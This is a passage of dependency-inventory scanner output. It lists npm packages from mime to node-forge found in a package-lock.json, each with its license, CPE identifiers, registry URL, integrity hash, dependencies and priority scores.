nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: a724fe9397f99c40 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: mime 3.0.0' + title: mime 3.0.0 + description: 'Package discovered: mime 3.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 438a12c55a1c15bf + name: mime + version: 3.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:mime_project:mime:3.0.0:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/mime@3.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/mime/-/mime-3.0.0.tgz + integrity: sha512-jSCU7/VB1loIWBZe14aEYHU/+1UMEHoaO7qxCOVJOw9GgH72VAWppxNcjU+x9a2k3GSIBXNKxXQFqRvvZ7vr3A== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 1454de8382f97ba2 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: mime-db 1.52.0' + title: mime-db 1.52.0 + description: 'Package discovered: mime-db 1.52.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: e010d1b3c9ab0c02 + name: mime-db + version: 1.52.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:mime-db:mime-db:1.52.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:mime-db:mime_db:1.52.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:mime_db:mime-db:1.52.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:mime_db:mime_db:1.52.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:mime:mime-db:1.52.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:mime:mime_db:1.52.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/mime-db@1.52.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz + integrity: sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: c62c037f2c05a588 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: mime-types 2.1.35' + title: mime-types 2.1.35 + description: 'Package discovered: mime-types 2.1.35' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: d035c2d2cba76761 + name: mime-types + version: 2.1.35 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:mime-types:mime-types:2.1.35:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:mime-types:mime_types:2.1.35:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:mime_types:mime-types:2.1.35:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:mime_types:mime_types:2.1.35:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:mime:mime-types:2.1.35:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:mime:mime_types:2.1.35:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/mime-types@2.1.35 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz + integrity: sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw== + dependencies: + mime-db: 1.52.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 39275c688371843a + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: minimatch 9.0.9' + title: minimatch 9.0.9 + description: 'Package discovered: minimatch 9.0.9' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: dadb042585b0fc99 + name: minimatch + version: 9.0.9 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:minimatch_project:minimatch:9.0.9:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/minimatch@9.0.9 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/minimatch/-/minimatch-9.0.9.tgz + integrity: sha512-OBwBN9AL4dqmETlpS2zasx+vTeWclWzkblfZk7KTA5j3jeOONz/tRCnZomUyvNg83wL5Zv9Ss6HMJXAgL8R2Yg== + dependencies: + brace-expansion: ^2.0.2 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: fe3ea9bf939aec06 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: minimist 1.2.8' + title: minimist 1.2.8 + description: 'Package discovered: minimist 1.2.8' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: bf8bc4c7577fa757 + name: minimist + version: 1.2.8 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:minimist:minimist:1.2.8:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/minimist@1.2.8 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz + integrity: sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 43d359d2fd9254cd + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: minipass 7.1.3' + title: minipass 7.1.3 + description: 'Package discovered: minipass 7.1.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: a4e62963fcdf0651 + name: minipass + version: 7.1.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: BlueOak-1.0.0 + spdxExpression: BlueOak-1.0.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:minipass:minipass:7.1.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/minipass@7.1.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/minipass/-/minipass-7.1.3.tgz + integrity: sha512-tEBHqDnIoM/1rXME1zgka9g6Q2lcoCkxHLuc7ODJ5BxbP5d4c2Z5cGgtXAku59200Cx7diuHTOYfSBD8n6mm8A== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 371d68f8a3e92216 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: mkdirp 0.5.6' + title: mkdirp 0.5.6 + description: 'Package discovered: mkdirp 0.5.6' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 4ee017b1ce1fca30 + name: mkdirp + version: 0.5.6 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:mkdirp:mkdirp:0.5.6:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/mkdirp@0.5.6 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.6.tgz + integrity: sha512-FP+p8RB8OWpF3YZBCrP5gtADmtXApB5AMLn+vdyA+PyxCjrCs00mjyUozssO33cwDeT3wNGdLxJ5M//YqtHAJw== + dependencies: + minimist: ^1.2.6 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 85ab0a570b2a1b2d + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: morgan 1.10.1' + title: morgan 1.10.1 + description: 'Package discovered: morgan 1.10.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 0b0e2e978d7d93f4 + name: morgan + version: 1.10.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:morgan_project:morgan:1.10.1:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/morgan@1.10.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/morgan/-/morgan-1.10.1.tgz + integrity: sha512-223dMRJtI/l25dJKWpgij2cMtywuG/WiUKXdvwfbhGKBhy1puASqXwFzmWZ7+K73vUPoR7SS2Qz2cI/g9MKw0A== + dependencies: + basic-auth: ~2.0.1 + debug: 2.6.9 + depd: ~2.0.0 + on-finished: ~2.3.0 + on-headers: ~1.1.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 19152fd7179a58f9 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: ms 2.0.0' + title: ms 2.0.0 + description: 'Package discovered: ms 2.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 46f1aa86e531772d + name: ms + version: 2.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:vercel:ms:2.0.0:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/ms@2.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/ms/-/ms-2.0.0.tgz + integrity: sha512-Tpp60P6IUJDTuOq/5Z8cdskzJujfwqfOTkrwIwj7IRISpnkJnT6SyJ4PCPnGMoFjC9ddhal5KVIYtAt97ix05A== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: c6acafac62af1ee0 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: ms 2.1.3' + title: ms 2.1.3 + description: 'Package discovered: ms 2.1.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: bb1077662b3cb7e0 + name: ms + version: 2.1.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:vercel:ms:2.1.3:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/ms@2.1.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/ms/-/ms-2.1.3.tgz + integrity: sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: ffedfc57a9f39743 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: multer 1.4.5-lts.2' + title: multer 1.4.5-lts.2 + description: 'Package discovered: multer 1.4.5-lts.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 775c553ab4f0a485 + name: multer + version: 1.4.5-lts.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:multer:multer:1.4.5-lts.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/multer@1.4.5-lts.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/multer/-/multer-1.4.5-lts.2.tgz + integrity: sha512-VzGiVigcG9zUAoCNU+xShztrlr1auZOlurXynNvO9GiWD1/mTBbUljOKY+qMeazBqXgRnjzeEgJI/wyjJUHg9A== + dependencies: + append-field: ^1.0.0 + busboy: ^1.0.0 + concat-stream: ^1.5.2 + mkdirp: ^0.5.4 + object-assign: ^4.1.1 + type-is: ^1.6.4 + xtend: ^4.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 9d7c97f3f3cb9ec0 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: mz 2.7.0' + title: mz 2.7.0 + description: 'Package discovered: mz 2.7.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 96c78782a0a6a6e8 + name: mz + version: 2.7.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:mz:mz:2.7.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/mz@2.7.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/mz/-/mz-2.7.0.tgz + integrity: sha512-z81GNO7nnYMEhrGh9LeymoE4+Yr0Wn5McHIZMK5cfQCl+NDX08sCZgUc9/6MHni9IWuFLm1Z3HTCXu2z9fN62Q== + dependencies: + any-promise: ^1.0.0 + object-assign: ^4.0.1 + thenify-all: ^1.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 545c4a29aa435f71 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: nanoid 3.3.11' + title: nanoid 3.3.11 + description: 'Package discovered: nanoid 3.3.11' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: fc2d97a12d1a4dda + name: nanoid + version: 3.3.11 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:nanoid_project:nanoid:3.3.11:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/nanoid@3.3.11 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/nanoid/-/nanoid-3.3.11.tgz + integrity: sha512-N8SpfPUnUp1bK+PMYW8qSWdl9U+wwNWI4QKxOYDy9JAro3WMX7p2OeVRF9v+347pnakNevPmiHhNmZ2HbFA76w== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 932afc2de4b38fa5 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: negotiator 0.6.3' + title: negotiator 0.6.3 + description: 'Package discovered: negotiator 0.6.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 312bd96694b2eb5b + name: negotiator + version: 0.6.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:negotiator:negotiator:0.6.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/negotiator@0.6.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/negotiator/-/negotiator-0.6.3.tgz + integrity: sha512-+EUsqGPLsM+j/zdChZjsnX51g4XrHFOIXwfnCVPGlQk/k5giakcKsuxCObBRu6DSm9opw/O6slWbJdghQM4bBg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: d346e21d42fdf73e + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: next 14.2.3' + title: next 14.2.3 + description: 'Package discovered: next 14.2.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: a9792237818f8415 + name: next + version: 14.2.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:vercel:next.js:14.2.3:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/next@14.2.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/next/-/next-14.2.3.tgz + integrity: sha512-dowFkFTR8v79NPJO4QsBUtxv0g9BrS/phluVpMAt2ku7H+cbcBJlopXjkWlwxrk/xGqMemr7JkGPGemPrLLX7A== + dependencies: + '@next/env': 14.2.3 + '@swc/helpers': 0.5.5 + busboy: 1.6.0 + caniuse-lite: ^1.0.30001579 + graceful-fs: ^4.2.11 + postcss: 8.4.31 + styled-jsx: 5.1.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 35dad46b81d74be4 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: node-cron 3.0.3' + title: node-cron 3.0.3 + description: 'Package discovered: node-cron 3.0.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 5c4492e68f441264 + name: node-cron + version: 3.0.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:node-cron:node-cron:3.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:node-cron:node_cron:3.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:node_cron:node-cron:3.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:node_cron:node_cron:3.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:node:node-cron:3.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:node:node_cron:3.0.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/node-cron@3.0.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/node-cron/-/node-cron-3.0.3.tgz + integrity: sha512-dOal67//nohNgYWb+nWmg5dkFdIwDm8EpeGYMekPMrngV3637lqnX0lbUcCtgibHTz6SEz7DAIjKvKDFYCnO1A== + dependencies: + uuid: 8.3.2 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 5d72f54e4946a64f + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: node-fetch 2.7.0' + title: node-fetch 2.7.0 + description: 'Package discovered: node-fetch 2.7.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 71294da0e67ef2a3 + name: node-fetch + version: 2.7.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:node-fetch_project:node-fetch:2.7.0:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/node-fetch@2.7.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/node-fetch/-/node-fetch-2.7.0.tgz + integrity: sha512-c4FRfUm/dbcWZ7U+1Wq0AwCyFL+3nt2bEw05wfxSz+DWpWsitgmSgYmy2dQdWyKC1694ELPqMs/YzUSNozLt8A== + dependencies: + whatwg-url: ^5.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 2cbaa504cc478c46 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: node-forge 1.4.0' + title: node-forge 1.4.0 + description: 'Package discovered: node-forge 1.4.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: c1e5f20287afef44 + name: node-forge + version: 1.4.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: (BSD-3-Clause OR GPL-2.0) + spdxExpression: (BSD-3-Clause OR GPL-2.0) + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: 